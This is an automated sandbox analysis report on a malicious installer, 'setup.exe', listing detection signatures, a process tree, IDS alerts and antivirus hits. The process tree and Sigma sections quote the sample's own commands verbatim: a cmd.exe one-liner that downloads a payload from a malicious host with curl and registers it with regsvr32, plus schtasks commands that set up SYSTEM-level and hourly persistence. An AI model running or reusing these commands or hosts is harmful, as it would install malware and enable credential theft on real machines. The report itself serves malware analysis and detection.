Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1630230
MD5:709bed9cee70325715c2ecbb759d4ec1
SHA1:58a535980d2528c06f32d29061d62c85d3486684
SHA256:49c0d9ca62ebf73a7d241726ba5e063e3fbdec8d034e476a101a21d195e725df
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected AdvancedInstaller

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 709BED9CEE70325715C2ECBB759D4EC1)
    • setup.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="6264" CHAINERUIPROCESSID="6264Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\setup.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741190130 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\setup.exe" AI_INSTALL="1" MD5: 709BED9CEE70325715C2ECBB759D4EC1)
  • msiexec.exe (PID: 5172 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2828 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F14E2A76A442D6363321E428E36E8EED C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3052 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 33E88EEEEB332764F0F0CD6649DD4742 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2652 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C61A3434910668BD7A1090272067B3E4 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MainSoftware.exe (PID: 4080 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent MD5: 7E91C0735D8936E8572276340A6F252E)
      • schtasks.exe (PID: 1704 cmdline: "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2816 cmdline: "schtasks.exe" /run /tn "MyPersistentApp_Hourly" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SoftwareDistributor.exe (PID: 6468 cmdline: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1 MD5: 2662878C97303F23A828146797CC4827)
      • schtasks.exe (PID: 7136 cmdline: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MainSoftware.exe (PID: 3868 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Loop MD5: 7E91C0735D8936E8572276340A6F252E)
    • Install.exe (PID: 7160 cmdline: "C:\Program Files (x86)\Main\Chop\Install.exe" MD5: 675F1B648B3E8810A4A32FE32546490B)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1660 cmdline: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1344 cmdline: curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\262810.ocx" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • regsvr32.exe (PID: 6924 cmdline: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • Install.exe (PID: 1888 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://datashieldsecure.com/amz/?source_id=1 MD5: 943BC558E7ED8FAEC5BF47A2352D42FE)
    • Surfclub.exe (PID: 5408 cmdline: "C:\Program Files\Surfclub\Surfclub.exe" install https://datashieldsecure.com/amz/?source_id=1 MD5: B051BE15C447E9C62AB13FC72A39D218)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AdvancedInstallerYara detected AdvancedInstallerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 6468, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, ProcessId: 7136, ProcessName: schtasks.exe
    Sigma detected: Invoke-Obfuscation VAR+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 6468, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, ProcessId: 7136, ProcessName: schtasks.exe
    Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 6468, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f, ProcessId: 7136, ProcessName: schtasks.exe
    Sigma detected: Msiexec Initiated Connection
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.183.127, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2652, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
    Sigma detected: Network Connection Initiated By Regsvr32.EXE
    Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 34.160.111.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 6924, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49971
    Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx", CommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1660, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx", ProcessId: 6924, ProcessName: regsvr32.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Main\Chop\Install.exe" , ParentImage: C:\Program Files (x86)\Main\Chop\Install.exe, ParentProcessId: 7160, ParentProcessName: Install.exe, ProcessCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ProcessId: 1660, ProcessName: cmd.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-05T16:59:52.555583+010028033053Unknown Traffic192.168.2.449995172.67.183.127443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-05T16:58:57.023374+010028292021A Network Trojan was detected192.168.2.449737172.67.183.127443TCP
    2025-03-05T16:59:14.994610+010028292021A Network Trojan was detected192.168.2.449739172.67.183.127443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://wetransfers.io/v.phpAvira URL Cloud: Label: malware
    Source: https://datashieldsecure.com/amz/?Avira URL Cloud: Label: malware
    Source: https://datashieldsecure.com/amz/?source_id=1Avira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\262810.ocxAvira: detection malicious, Label: TR/Agent_AGen.wslhm
    Multi AV Scanner detection for dropped file
    Source: C:\Program Files (x86)\Main\Chop\Install.exeReversingLabs: Detection: 31%
    Source: C:\Users\user\AppData\Local\Temp\262810.ocxReversingLabs: Detection: 51%
    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: C:\Program Files\Surfclub\Install.exeDirectory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\domains
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49937 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49945 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49962 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49977 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49987 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49999 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:50008 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
    Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000013.00000002.2503002446.0000020F3A5F0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574581744.000001A50AC90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000013.00000002.2502593462.0000020F3A561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502506832.0000020F3A521000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000013.00000002.2489583229.0000020F375AC000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489694248.0000020F37641000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000013.00000002.2489300922.0000020F37511000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489560998.0000020F37591000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37577000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37216000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488782180.0000020F372E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37211000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000013.00000002.2489276519.0000020F37501000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489234377.0000020F374F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34474000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000013.00000002.2502776162.0000020F3A5B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502635521.0000020F3A5A2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574402265.000001A50AC51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F3775D000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490316786.0000020F37781000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DFD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489453415.0000020F37561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489389183.0000020F3754A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2554946567.000001A507DB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000013.00000002.2502957878.0000020F3A5E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502832383.0000020F3A5CD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489583229.0000020F375AC000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489694248.0000020F37641000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000013.00000002.2487832561.0000020F354C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487899580.0000020F354D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2546435914.000001A505E01000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F3773C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490087775.0000020F37741000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000013.00000002.2487213233.0000020F35241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487133129.0000020F3520D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1755437103.0000000009AC9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1932053520.000000000784C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000013.00000002.2485624708.000001CE9F8F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485552514.000001CE9F8C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2539907807.00000164700D9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489017313.0000020F373F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F3547B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487805041.0000020F354A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000013.00000002.2484894819.000001CE9DE41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488855338.0000020F373AB000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2503002446.0000020F3A5F0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574581744.000001A50AC90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp
